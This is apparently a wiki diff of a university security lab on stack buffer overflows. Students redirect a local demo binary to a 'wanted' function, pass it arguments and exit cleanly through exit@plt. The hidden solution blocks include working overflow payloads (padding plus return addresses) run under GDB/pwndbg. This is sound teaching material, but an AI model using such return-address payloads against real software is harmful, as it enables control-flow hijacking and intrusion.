+More details can be found [[https://codywu2010.wordpress.com/2014/11/29/about-elf-pie-pic-and-else/|here]].
+Recompile the program without PIC and PIE using ''-fno-pic -no-pie'' options for GCC.
 <code>
-b6 <wanted>:
-b6:	55                   	push   ebp
-b7:	89 e5                	mov    ebp,esp
-b9:	83 ec 08             	sub    esp,0x8
-</code>
-<note tip>
+a6 <wanted>:
-Use //python -c 'print("A" * NR + "\xGH\xEF\xCD\xAB")'// to generate the payload for calling the function with address 0xABCDEFGH. You have to find the value of NR.
+a6:       55                      push   ebp
-</note>
+a7:       89 e5                   mov    ebp,esp
+a9:       83 ec 08                sub    esp,0x8
+</code>
 <solution -hidden>
 <code>
-student@host$ objdump -d -M intel buffovf | grep wanted
-b6 <wanted>:
+pwndbg> run "Florin" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 24 + b"\xa6\x91\x04\x08")')
-c3:	75 12                	jne    80484d7 <wanted+0x21>
+...
-d5:	eb 10                	jmp    80484e7 <wanted+0x31>
+hey, args
-student@host$ python -c "print(24 * 'A' + '\xb6\x84\x04\x08')" | ./buffovf AAAA
-hey, AAAA
 what's ur last name?
 bye
 at least you tried
-Segmentation fat (core dumped)
+Program received signal SIGSEGV, Segmentation fault.
 </code>
 </solution>
-=== 07. Calling ''wanted'' function with the correct arguments ===
+=== 08. [20p] Calling the ''wanted'' function with the correct arguments ===
-The ''wanted'' function takes an argument. Adjust the previous payload so that when calling ''wanted'', the message ''well done, you're cool!'' is displayed.
+The ''wanted'' function takes an argument.
+Adjust the previous payload so that when calling ''wanted'', the message ''well done, you're cool!'' is displayed.
 <solution -hidden>
 <code>
-student@host$ python -c "print(24 * 'A' + '\xb6\x84\x04\x08' + 4 * 'B' + '\xbe\xba\xfe\xca')"| ./buffovf AAAA
-hey, AAAA
+pwndbg> run "Florin" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 24 + b"\xa6\x91\x04\x08" + b"B" * 4 + b"\xbe\xba\xfe\xca")')
+...
+hey, Florin
 what's ur last name?
 bye
 well done, you're cool!
-Segmentation fat (core dumped)
+Program received signal SIGSEGV, Segmentation fault.
 </code>
 </solution>
-=== 08. Graceful exit ===
+=== 09. [20p] Graceful exit ===
+We can see that even if we call ''wanted'' with the correct arguments, the program still crashes.
-We can see that even if we call ''wanted'' with the correct arguments, the program still crashes. Let's remove any trace that we've been there. Adjust the previous payload so that the program exits without a segmentation fault.
+Let's remove any trace that we've been there. Adjust the previous payload so that the program exits without a segmentation fault.
 <note tip>
-Can you call another function after ''wanted''? What would be a great function to call? Where can you get its address from? After finding out the function, look for its address using objdump, you might find something there.
+Can you call another function after ''wanted''?
+What would be a great function to call?
+Where can you get its address from?
+After finding out the function, look for its address using ''objdump'', you might find something there.
 </note>
 <solution -hidden>
-We use ''exit@plt'' to exit with the argument ''0'' the program gracefully.
 <code>
-student@host:~$ objdump -d -M intel buffovf | grep exit
-08048370 <exit@plt>:
+➜ objdump -d -M intel buffovf | grep exit
- 8048585:	e8 e6 fd ff ff       	call   8048370 <exit@plt>
+08049080 <exit@plt>:
-student@host:~$ python -c "print(24 * 'A' + '\xb6\x84\x04\x08' + '\x70\x83\x04\x08' + '\xbe\xba\xfe\xca' + '\x00\x00\x00\x00'") | ./buffovf AAAA
+...
-hey, AAAA
+➜ gdb buggy
+...
+pwndbg> run "Florin" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 24 + b"\xa6\x91\x04\x08" + b"\x80\x90\x04\x08" + b"\xbe\xba\xfe\xca")')
+...
+hey, Florin
 what's ur last name?
 bye
 well done, you're cool!
-student@host:~$
+[Inferior 1 (process 39220) exited normally]
 </code>
 </solution>
 <hidden>
-=== 09. Writing memory ===
-We want to use our new GDB skills to make the application print two times ''Hello!'', even if we run it having ''AAA'' as argument.
+=== 10. Writing memory ===
-  - Find out the address of the buffer containing the ''Hello!'' string.
-  - Continue the execution until the beginning of the ''copy'' function, disassemble the code and go step by step through the assembly instructions until the ''call'' instruction (do not execute the call).
+We want to use our new GDB skills to make the application print two times ''Hello!'', even if we run it having ''AAA'' as argument.
+  - Find out the address of the buffer containing the ''Hello!'' string.
+  - Continue the execution until the beginning of the ''copy'' function, disassemble the code and go step by step through the assembly instructions until the ''call'' instruction (do not execute the call).
   - Print the value of the stack pointer. Dump 2 values on the stack. What are the two values representing?
   - Overwrite the second value on the stack with the address of the buffer containing the ''Hello!'' string and then continue the execution. What happened?
@@ Line 542: / Line 727: @@
 <solution -hidden>
 <code>
 (gdb) b main
 Breakpoint 2 at 0x8048483: file buffovf.c, line 16.
@@ Line 571: / Line 757: @@
 x08048469 <+21>:	add    $0x10,%esp
 x0804846c <+24>:	nop
 x0804846d <+25>:	leave
 x0804846e <+26>:	ret
 End of assembler dump.
 (gdb) si
@@ Line 594: / Line 780: @@
 x08048469 <+21>:	add    $0x10,%esp
 x0804846c <+24>:	nop
 x0804846d <+25>:	leave
 x0804846e <+26>:	ret
 End of assembler dump.
 (gdb) p $esp
@@ Line 610: / Line 796: @@
 Hello!
 [Inferior 1 (process 2906) exited normally]
 </code>
 </solution>
 </hidden>
-=== 09. Feedback ===
+=== Feedback ===
 Please take a minute to fill in the [[https://forms.gle/5Lu1mFa63zptk2ox9|feedback form]] for this lab.

Lectures

Labs

Support

isc/labs/06.1681130250.txt.gz · Last modified: 2023/04/10 15:37 by florin.stancu

Show page Old revisions

Media Manager Back to top